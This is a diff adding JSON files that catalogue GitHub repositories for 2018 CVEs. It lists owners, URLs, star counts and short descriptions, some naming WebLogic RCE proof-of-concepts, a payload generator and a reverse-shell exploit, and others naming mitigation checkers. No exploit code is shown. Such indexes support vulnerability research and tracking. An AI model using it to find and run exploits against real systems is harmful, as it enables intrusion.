"id": 222744850, + "name": "PyLadon", + "full_name": "k8gege\/PyLadon", + "owner": { + "login": "k8gege", + "id": 42312878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42312878?v=4", + "html_url": "https:\/\/github.com\/k8gege", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k8gege\/PyLadon", + "description": "Ladon Scanner For Python, Large Network Penetration Scanner & Cobalt Strike, vulnerability \/ exploit \/ detection \/ MS17010\/SmbGhost\/CVE-2020-0796\/CVE-2018-2894", + "fork": false, + "created_at": "2019-11-19T16:51:39Z", + "updated_at": "2024-10-29T08:00:38Z", + "pushed_at": "2020-12-08T15:39:24Z", + "stargazers_count": 51, + "watchers_count": 51, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 51, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-3191.json b/2018/CVE-2018-3191.json new file mode 100644 index 0000000000..f1dbb34b06 --- /dev/null +++ b/2018/CVE-2018-3191.json @@ -0,0 +1,157 @@ +[ + { + "id": 154076972, + "name": "CVE-2018-3191", + "full_name": "arongmh\/CVE-2018-3191", + "owner": { + "login": "arongmh", + "id": 30547070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30547070?v=4", + "html_url": "https:\/\/github.com\/arongmh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arongmh\/CVE-2018-3191", + "description": "CVE-2018-3191 payload generator", + "fork": false, + "created_at": "2018-10-22T02:29:12Z", + "updated_at": "2024-08-12T19:42:37Z", + "pushed_at": "2018-10-21T17:28:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 48, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 154266159, + "name": "CVE-2018-3191", + "full_name": "m00zh33\/CVE-2018-3191", + "owner": { + "login": "m00zh33", + "id": 4264383, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4264383?v=4", + "html_url": "https:\/\/github.com\/m00zh33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m00zh33\/CVE-2018-3191", + "description": "CVE-2018-3191-PoC", + "fork": false, + "created_at": "2018-10-23T05:12:12Z", + "updated_at": "2024-05-28T16:31:28Z", + "pushed_at": "2018-10-23T05:10:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 49, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 49, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 154368972, + "name": "CVE-2018-3191", + "full_name": "Libraggbond\/CVE-2018-3191", + "owner": { + "login": "Libraggbond", + "id": 37012218, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37012218?v=4", + "html_url": "https:\/\/github.com\/Libraggbond", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Libraggbond\/CVE-2018-3191", + "description": "CVE-2018-3191 反弹shell", + "fork": false, + "created_at": "2018-10-23T17:24:43Z", + "updated_at": "2024-08-12T19:42:39Z", + "pushed_at": "2018-10-23T17:28:05Z", + "stargazers_count": 63, + "watchers_count": 63, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 63, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 154426418, + "name": "CVE-2018-3191", + "full_name": "jas502n\/CVE-2018-3191", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2018-3191", + "description": "Weblogic-CVE-2018-3191远程代码命令执行漏洞", + "fork": false, + "created_at": "2018-10-24T02:26:53Z", + "updated_at": "2024-05-28T16:09:12Z", + "pushed_at": "2018-10-24T17:42:47Z", + "stargazers_count": 65, + "watchers_count": 65, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 65, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 154477893, + "name": "CVE-2018-3191-Rce-Exploit", + "full_name": "mackleadmire\/CVE-2018-3191-Rce-Exploit", + "owner": { + "login": "mackleadmire", + "id": 10216868, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10216868?v=4", + "html_url": "https:\/\/github.com\/mackleadmire", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mackleadmire\/CVE-2018-3191-Rce-Exploit", + "description": null, + "fork": false, + "created_at": "2018-10-24T09:54:00Z", + "updated_at": "2024-08-12T19:42:41Z", + "pushed_at": "2018-10-25T08:12:46Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 17, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-3245.json b/2018/CVE-2018-3245.json new file mode 100644 index 0000000000..bc1cc141dd --- /dev/null +++ b/2018/CVE-2018-3245.json @@ -0,0 +1,95 @@ +[ + { + "id": 154452586, + "name": "CVE-2018-3245", + "full_name": "pyn3rd\/CVE-2018-3245", + "owner": { + "login": "pyn3rd", + "id": 41412951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41412951?v=4", + "html_url": "https:\/\/github.com\/pyn3rd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pyn3rd\/CVE-2018-3245", + "description": "CVE-2018-3245-PoC", + "fork": false, + "created_at": "2018-10-24T06:49:33Z", + "updated_at": "2024-09-13T14:17:13Z", + "pushed_at": "2021-07-13T02:29:19Z", + "stargazers_count": 167, + "watchers_count": 167, + "has_discussions": false, + "forks_count": 60, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 60, + "watchers": 167, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 154593773, + "name": "CVE-2018-3245", + "full_name": "jas502n\/CVE-2018-3245", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2018-3245", + "description": "CVE-2018-3245", + "fork": false, + "created_at": "2018-10-25T01:46:56Z", + "updated_at": "2022-03-06T14:33:41Z", + "pushed_at": "2018-10-25T02:01:39Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 219765536, + "name": "CVE-2018-3245", + "full_name": "ianxtianxt\/CVE-2018-3245", + "owner": { + "login": "ianxtianxt", + "id": 45796484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45796484?v=4", + "html_url": "https:\/\/github.com\/ianxtianxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianxtianxt\/CVE-2018-3245", + "description": "CVE-2018-3245", + "fork": false, + "created_at": "2019-11-05T14:30:18Z", + "updated_at": "2024-08-12T19:54:34Z", + "pushed_at": "2019-11-05T14:31:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-3252.json b/2018/CVE-2018-3252.json new file mode 100644 index 0000000000..ccdf223640 --- /dev/null +++ b/2018/CVE-2018-3252.json @@ -0,0 +1,95 @@ +[ + { + "id": 154596948, + "name": "CVE-2018-3252", + "full_name": "jas502n\/CVE-2018-3252", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2018-3252", + "description": "Weblogic-CVE-2018-3252", + "fork": false, + "created_at": "2018-10-25T02:16:49Z", + "updated_at": "2019-03-12T05:44:19Z", + "pushed_at": "2018-10-25T02:16:50Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 160289379, + "name": "CVE-2018-3252", + "full_name": "go-spider\/CVE-2018-3252", + "owner": { + "login": "go-spider", + "id": 13690411, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13690411?v=4", + "html_url": "https:\/\/github.com\/go-spider", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/go-spider\/CVE-2018-3252", + "description": null, + "fork": false, + "created_at": "2018-12-04T03:14:21Z", + "updated_at": "2023-02-14T04:28:25Z", + "pushed_at": "2018-12-04T04:01:01Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 160681161, + "name": "CVE-2018-3252", + "full_name": "pyn3rd\/CVE-2018-3252", + "owner": { + "login": "pyn3rd", + "id": 41412951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41412951?v=4", + "html_url": "https:\/\/github.com\/pyn3rd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pyn3rd\/CVE-2018-3252", + "description": "CVE-2018-3252-PoC", + "fork": false, + "created_at": "2018-12-06T13:48:53Z", + "updated_at": "2024-08-12T19:43:50Z", + "pushed_at": "2018-12-07T04:31:50Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 74, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-3260.json b/2018/CVE-2018-3260.json new file mode 100644 index 0000000000..befaa15197 --- /dev/null +++ b/2018/CVE-2018-3260.json @@ -0,0 +1,43 @@ +[ + { + "id": 116214746, + "name": "SpecuCheck", + "full_name": "ionescu007\/SpecuCheck", + "owner": { + "login": "ionescu007", + "id": 6047864, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6047864?v=4", + "html_url": "https:\/\/github.com\/ionescu007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ionescu007\/SpecuCheck", + "description": "SpecuCheck is a Windows utility for checking the state of the software mitigations and hardware against CVE-2017-5754 (Meltdown), CVE-2017-5715 (Spectre v2), CVE-2018-3260 (Foreshadow), and CVE-2018-3639 (Spectre v4)", + "fork": false, + "created_at": "2018-01-04T04:32:26Z", + "updated_at": "2024-11-27T17:09:10Z", + "pushed_at": "2019-11-19T03:36:46Z", + "stargazers_count": 568, + "watchers_count": 568, + "has_discussions": false, + "forks_count": 82, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cpu", + "intelbug", + "internals", + "kaiser", + "kernel", + "kpti", + "meltdown", + "spectre", + "windows" + ], + "visibility": "public", + "forks": 82, + "watchers": 568, + "score": 0, + "subscribers_count": 52 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-3295.json b/2018/CVE-2018-3295.json new file mode 100644 index 0000000000..431f05217e --- /dev/null +++ b/2018/CVE-2018-3295.json @@ -0,0 +1,64 @@ +[ + { + "id": 170207286, + "name": "e1000_vulnerability_exploit", + "full_name": "ndureiss\/e1000_vulnerability_exploit", + "owner": { + "login": "ndureiss", + "id": 38342872, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38342872?v=4", + "html_url": "https:\/\/github.com\/ndureiss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ndureiss\/e1000_vulnerability_exploit", + "description": "Exploitation of VirtualBox vulnerability (https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2018-3295)", + "fork": false, + "created_at": "2019-02-11T21:44:47Z", + "updated_at": "2019-04-28T14:26:42Z", + "pushed_at": "2019-03-06T14:12:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 307046811, + "name": "cve-2018-3295", + "full_name": "jeongzero8732\/cve-2018-3295", + "owner": { + "login": "jeongzero8732", + "id": 35132299, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35132299?v=4", + "html_url": "https:\/\/github.com\/jeongzero8732", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jeongzero8732\/cve-2018-3295", + "description": null, + "fork": false, + "created_at": "2020-10-25T07:33:29Z", + "updated_at": "2021-02-17T15:23:29Z", + "pushed_at": "2021-02-17T15:23:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-3608.json b/2018/CVE-2018-3608.json new file mode 100644 index 0000000000..cfae03cfb7 --- /dev/null +++ b/2018/CVE-2018-3608.json @@ -0,0 +1,33 @@ +[ + { + "id": 120301126, + "name": "Trend_Micro_POC", + "full_name": "gguaiker\/Trend_Micro_POC", + "owner": { + "login": "gguaiker", + "id": 35134599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35134599?v=4", + "html_url": "https:\/\/github.com\/gguaiker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gguaiker\/Trend_Micro_POC", + "description": "CVE-2018-3608 Trend_Micro_CVE", + "fork": false, + "created_at": "2018-02-05T12:22:28Z", + "updated_at": "2019-09-27T17:09:24Z", + "pushed_at": "2018-02-05T12:55:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-3639.json b/2018/CVE-2018-3639.json new file mode 100644 index 0000000000..511eb9c074 --- /dev/null +++ b/2018/CVE-2018-3639.json @@ -0,0 +1,136 @@ +[ + { + "id": 135628428, + "name": "ssbd-tools", + "full_name": "tyhicks\/ssbd-tools", + "owner": { + "login": "tyhicks", + "id": 1051156, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1051156?v=4", + "html_url": "https:\/\/github.com\/tyhicks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tyhicks\/ssbd-tools", + "description": "Tools to exercise the Linux kernel mitigation for CVE-2018-3639 (aka Variant 4) using the Speculative Store Bypass Disable (SSBD) feature of x86 processors", + "fork": false, + "created_at": "2018-05-31T19:48:18Z", + "updated_at": "2024-02-14T06:09:50Z", + "pushed_at": "2018-06-01T16:53:36Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2018-3639", + "side-channel", + "speculation", + "ssbd", + "variant4" + ], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 137829375, + "name": "Intel-CVE-2018-3639-Mitigation_RegistryUpdate", + "full_name": "malindarathnayake\/Intel-CVE-2018-3639-Mitigation_RegistryUpdate", + "owner": { + "login": "malindarathnayake", + "id": 9443796, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9443796?v=4", + "html_url": "https:\/\/github.com\/malindarathnayake", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/malindarathnayake\/Intel-CVE-2018-3639-Mitigation_RegistryUpdate", + "description": null, + "fork": false, + "created_at": "2018-06-19T02:19:26Z", + "updated_at": "2018-06-19T02:57:22Z", + "pushed_at": "2018-06-19T02:57:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 186128549, + "name": "CVE-2018-3639", + "full_name": "mmxsrup\/CVE-2018-3639", + "owner": { + "login": "mmxsrup", + "id": 19609323, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19609323?v=4", + "html_url": "https:\/\/github.com\/mmxsrup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mmxsrup\/CVE-2018-3639", + "description": "Speculative Store Bypass (CVE-2018-3639) proof of concept for Linux", + "fork": false, + "created_at": "2019-05-11T12:11:05Z", + "updated_at": "2024-02-28T02:21:41Z", + "pushed_at": "2021-10-22T16:05:33Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2018-3639", + "spectre", + "spectreexploit-poc" + ], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 193920426, + "name": "CVE-2018-3639-specter-v4-", + "full_name": "Shuiliusheng\/CVE-2018-3639-specter-v4-", + "owner": { + "login": "Shuiliusheng", + "id": 12653519, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12653519?v=4", + "html_url": "https:\/\/github.com\/Shuiliusheng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shuiliusheng\/CVE-2018-3639-specter-v4-", + "description": "spectre v4 : Speculative Store Bypass (CVE-2018-3639) proof of concept for Linux", + "fork": false, + "created_at": "2019-06-26T14:26:13Z", + "updated_at": "2022-06-09T13:28:22Z", + "pushed_at": "2019-06-26T14:34:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-3760.json b/2018/CVE-2018-3760.json new file mode 100644 index 0000000000..9495a376e9 --- /dev/null +++ b/2018/CVE-2018-3760.json @@ -0,0 +1,95 @@ +[ + { + "id": 216585746, + "name": "CVE-2018-3760", + "full_name": "mpgn\/CVE-2018-3760", + "owner": { + "login": "mpgn", + "id": 5891788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mpgn\/CVE-2018-3760", + "description": "Rails Asset Pipeline Directory Traversal Vulnerability ", + "fork": false, + "created_at": "2019-10-21T14:15:09Z", + "updated_at": "2024-08-12T19:54:08Z", + "pushed_at": "2019-10-21T14:22:42Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 274660536, + "name": "Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-", + "full_name": "cyberharsh\/Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-", + "owner": { + "login": "cyberharsh", + "id": 57433814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57433814?v=4", + "html_url": "https:\/\/github.com\/cyberharsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberharsh\/Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-", + "description": null, + "fork": false, + "created_at": "2020-06-24T12:15:07Z", + "updated_at": "2024-09-17T21:08:41Z", + "pushed_at": "2020-08-10T11:19:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 890909844, + "name": "CVE-2018-3760-poc", + "full_name": "wudidwo\/CVE-2018-3760-poc", + "owner": { + "login": "wudidwo", + "id": 121968635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121968635?v=4", + "html_url": "https:\/\/github.com\/wudidwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wudidwo\/CVE-2018-3760-poc", + "description": null, + "fork": false, + "created_at": "2024-11-19T11:52:53Z", + "updated_at": "2024-11-19T11:54:07Z", + "pushed_at": "2024-11-19T11:54:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-3783.json b/2018/CVE-2018-3783.json new file mode 100644 index 0000000000..58fd28c0f1 --- /dev/null +++ b/2018/CVE-2018-3783.json @@ -0,0 +1,36 @@ +[ + { + "id": 213851960, + "name": "nosqli-flintcms", + "full_name": "nisaruj\/nosqli-flintcms", + "owner": { + "login": "nisaruj", + "id": 14250095, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14250095?v=4", + "html_url": "https:\/\/github.com\/nisaruj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nisaruj\/nosqli-flintcms", + "description": "Blind noSQL injection case study lab based on CVE-2018-3783", + "fork": false, + "created_at": "2019-10-09T07:35:59Z", + "updated_at": "2023-02-11T11:32:09Z", + "pushed_at": "2023-02-04T02:52:36Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "nosql-injection" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-3786.json b/2018/CVE-2018-3786.json new file mode 100644 index 0000000000..be1f0194f7 --- /dev/null +++ b/2018/CVE-2018-3786.json @@ -0,0 +1,33 @@ +[ + { + "id": 265239613, + "name": "egg-scripts-CVE-2018-3786", + "full_name": "erik-krogh\/egg-scripts-CVE-2018-3786", + "owner": { + "login": "erik-krogh", + "id": 54990334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54990334?v=4", + "html_url": "https:\/\/github.com\/erik-krogh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erik-krogh\/egg-scripts-CVE-2018-3786", + "description": "A fork of an old version of egg-scripts", + "fork": false, + "created_at": "2020-05-19T12:21:16Z", + "updated_at": "2020-05-19T12:22:27Z", + "pushed_at": "2020-05-19T12:22:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-3810.json b/2018/CVE-2018-3810.json new file mode 100644 index 0000000000..647356b979 --- /dev/null +++ b/2018/CVE-2018-3810.json @@ -0,0 +1,95 @@ +[ + { + "id": 127300096, + "name": "CVE-2018-3810", + "full_name": "lucad93\/CVE-2018-3810", + "owner": { + "login": "lucad93", + "id": 11524244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11524244?v=4", + "html_url": "https:\/\/github.com\/lucad93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lucad93\/CVE-2018-3810", + "description": null, + "fork": false, + "created_at": "2018-03-29T14:04:11Z", + "updated_at": "2018-03-29T14:06:18Z", + "pushed_at": "2018-04-04T13:42:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 168879431, + "name": "cve-2018-3810", + "full_name": "cved-sources\/cve-2018-3810", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2018-3810", + "description": "cve-2018-3810", + "fork": false, + "created_at": "2019-02-02T21:19:32Z", + "updated_at": "2021-04-15T22:52:33Z", + "pushed_at": "2021-04-15T22:52:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 391018517, + "name": "CVE-2018-3810_exploit", + "full_name": "nth347\/CVE-2018-3810_exploit", + "owner": { + "login": "nth347", + "id": 20441996, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20441996?v=4", + "html_url": "https:\/\/github.com\/nth347", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nth347\/CVE-2018-3810_exploit", + "description": "Exploit for CVE-2018-3810", + "fork": false, + "created_at": "2021-07-30T10:06:04Z", + "updated_at": "2024-08-12T20:15:08Z", + "pushed_at": "2021-07-30T10:17:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-3811.json b/2018/CVE-2018-3811.json new file mode 100644 index 0000000000..3413297af3 --- /dev/null +++ b/2018/CVE-2018-3811.json @@ -0,0 +1,33 @@ +[ + { + "id": 168879761, + "name": "cve-2018-3811", + "full_name": "cved-sources\/cve-2018-3811", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2018-3811", + "description": "cve-2018-3811", + "fork": false, + "created_at": "2019-02-02T21:22:49Z", + "updated_at": "2021-04-15T22:53:16Z", + "pushed_at": "2021-04-15T22:53:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4013.json b/2018/CVE-2018-4013.json new file mode 100644 index 0000000000..28cb61b1c9 --- /dev/null +++ b/2018/CVE-2018-4013.json @@ -0,0 +1,64 @@ +[ + { + "id": 154464449, + "name": "cve-2018-4013", + "full_name": "DoubleMice\/cve-2018-4013", + "owner": { + "login": "DoubleMice", + "id": 22325256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22325256?v=4", + "html_url": "https:\/\/github.com\/DoubleMice", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DoubleMice\/cve-2018-4013", + "description": "TALOS-2018-0684\/cve-2018-4013 poc", + "fork": false, + "created_at": "2018-10-24T08:19:25Z", + "updated_at": "2018-12-05T10:24:48Z", + "pushed_at": "2018-11-24T03:01:25Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 158950902, + "name": "RTSPServer-Code-Execution-Vulnerability", + "full_name": "r3dxpl0it\/RTSPServer-Code-Execution-Vulnerability", + "owner": { + "login": "r3dxpl0it", + "id": 43002597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43002597?v=4", + "html_url": "https:\/\/github.com\/r3dxpl0it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r3dxpl0it\/RTSPServer-Code-Execution-Vulnerability", + "description": "RTSPServer Code Execution Vulnerability CVE-2018-4013", + "fork": false, + "created_at": "2018-11-24T15:49:53Z", + "updated_at": "2023-11-02T03:21:23Z", + "pushed_at": "2018-11-26T23:35:57Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + 